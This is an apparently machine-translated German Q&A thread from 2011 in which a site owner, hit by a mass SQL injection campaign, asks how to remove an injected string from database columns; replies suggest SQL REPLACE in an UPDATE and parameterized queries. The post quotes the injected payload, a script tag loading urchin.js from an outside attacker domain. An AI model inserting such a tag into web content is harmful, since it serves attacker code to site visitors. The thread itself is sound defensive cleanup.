sql-Zeichenfolge entfernen von Feld-und update

Habe ich leider ein Opfer von diesem letzten Angriff: http://www.theregister.co.uk/2011/10/14/mass_website_inection_grows/. Ich habe festgestellt, die verdächtigen code in viele Felder in meiner Datenbank.

Den zusätzlichen code in jeder Zelle ist immer die gleiche:

WARNUNG: versuchen Sie nicht, laden Sie den Speicherort dieser Datei, ich weiß nicht, was die Folgen sein könnte, aber ich werde nicht verantwortlich sein für alle wollen, um herauszufinden,

</title><script src=http://nbnjki.com/urchin.js ></script>

Ich bin auf der Suche nach einer Abfrage, die ich ausführen kann, die jede Zelle in einer ausgewählten Spalte, und wenn er findet diesen string, ersetzen Sie es mit '', machen Sie sicher, dass Sie keine Auswirkungen auf den vorhandenen Inhalt der Zelle.

  • Sie verstehen, dass dies eine temporäre Lösung, und selbst wenn Sie es aktualisieren, Sie können gehackt 3 Sekunden später. Stellen Sie sicher, dass Sie mit parametrisierten Abfragen oder gespeicherte Prozeduren, sollten Sie nie verwenden, inline-SQL, verkettet Benutzereingaben
InformationsquelleAutor Chris | 2011-10-16
  1. 6

    Ok hab meine Lösung, denke ich geriet in Panik, wegen der Dringlichkeit, gerade realisiert, für alle anderen:

    Update dbo.authors
Set    city = replace(city, 'Salt', 'Olympic');

    vom http://www.sqlteam.com/article/using-replace-in-an-update-statement

    • Und was ist wenn man angegriffen in 2 Minuten...sind Sie wirklich nur mit diesen Wundpflaster statt der Fixierung des eigentliche problem....zum Beispiel nicht die Verwendung von inline-SQL mit verketteten Benutzereingaben
    • Ich Schätze die Ursache des Problems auch repariert werden muss, aber an einem gewissen Punkt ebenfalls in die Datenbank repariert werden muss, so werde ich NOCH dieses Update benötigen
    InformationsquelleAutor Chris
  2. 0

    Könnten Sie die ERSETZEN Funktion in einer UPDATE-Anweisung.

    InformationsquelleAutor imm
Schreibe einen Kommentar